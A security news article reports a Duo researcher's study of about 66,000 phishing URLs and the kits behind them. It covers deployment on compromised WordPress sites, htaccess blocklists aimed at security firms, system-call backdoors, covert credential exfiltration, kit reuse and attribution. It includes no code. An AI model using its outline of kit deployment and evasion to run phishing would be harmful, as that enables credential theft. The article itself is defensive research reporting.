Phishing kits are used extensively by cybercriminals to increase the efficiency of stealing user credentials. The basic kit comprises an accurate clone of the target medium’s login-in page (Gmail, Facebook, Office 365, targeted banks, etc), and a pre-written php script to steal the credentials — both bundled and distributed as a zip file. Successfully phished credentials are mailed by the script to the phisher, or gathered in a text file for later collection. This is commodity phishing; not spear-phishing.
A legitimate website, often a WordPress site with old and vulnerable add-ons, is compromised. An orphaned page with no internal links is created, and the kit uploaded and unzipped. It is largely unknown to the site’s administrator and invisible to external search engines; and is ready to use. The criminal merely has to send out his phishing emails pointing to the spoofed login on the compromised website.
Wright used two different community-driven phishing URL feeds to locate them: PhishTank run by OpenDNS, and OpenPhish.
“We polled these feeds repeatedly over a month to get new suspect phishing URLs to analyze,” Wright told SecurityWeek. “We collected about 66,000.”
One of the first things discovered was widespread use of persistence techniques. A common method on compromised WordPress sites is the inclusion of an htaccess directory configuration file within the phishing kit, that blocked access to the phishing folder from threat intelligence services. One example blocks more than 220 specified domains (including major endpoint protection firms, law enforcement agencies, and individual IP addresses). “Comparison of the different htaccess files,” said Wright, “showed that there is definite information sharing between the kit developers.”
The same functionality was sometimes provided by php scripts included in the kit — but Duo detected more than 200 instances of the kit developers’ own backdoors buried within the code. It is a simple call to the system function. “It takes whatever you give it as a parameter and executes it as a system command,” explained Wright. “This lets anyone gain access to the host, leaving it wide open for future attack.” It gives the original kit developer future access to the host without having to go through the process of compromising it himself. In a similar vein, some of the scripts contained obfuscated code to quietly send the stolen credentials to the developer as well as the phisher.
By hashing the collected phishing kits, Duo was able to examine the extent of kit reuse. In the month-long investigation, it found that the majority of kits were only used once — but 27% (more than 900 kits) were seen on more than one host. Two were found on more than thirty hosts, indicating very active attackers. “We expect,” said Wright, “that as we continue this study, we shall see more instances of reuse.”
The email addresses of the individual kit users were extracted and correlated to show which phishers were connected with which campaigns and which phishing kits. Duo found that the kit developer would often use the ‘From’ header as a ‘brand’ signing card, tying multiple different kits to the same author. One in particular called himself ‘wirez[@]googledocs[.]org’. This branding was found in more than 115 unique phishing kits spoofing multiple service providers.
While information sharing in the cybercriminal world is well-known, this is the first evidence of the extent to which phishing kits and phishing information are also shared.
“A next step from this study, and something we are trying to establish,” Wright told SecurityWeek, “is a funnel to send the discovered email addresses of the phishers to the relevant authorities — both email providers and law enforcement. If we can get that email address shut down as soon as we find it, any credentials harvested by the phishing kit will not be sent to the phisher — and that’s a net gain for the defenders.” It neutralizes the phishing kit without having to go through the process of shutting down the compromised website — which may otherwise be perfectly legitimate.
“I’ll be able to say, I know this information was collected,” he continued, “and from there it was emailed to that attacker. I’ve already been in touch with Gmail or Yahoo to get that address taken down — well, that’s huge. If I have that kind of knowledge and I have that kind of insight into what happened, I can take effective action in my incident response cleanup activities.”
The reality, however, is that this level of information could also lead to some organizations taking matters into their own hands with ‘active defense’. If a particular phishing kit attacking a particular organization is discovered, and found to include the system call backdoor in the php script code, then that organization could enter the host and remove the danger. “A risk with any kind of hacking back is it’s so easy to cause collateral damage,” warned Wright; “and that’s what you have to be so careful about. This study is about how you can help protect your organization — it’s not about hacking back.” Which is, of course. illegal — for now at least.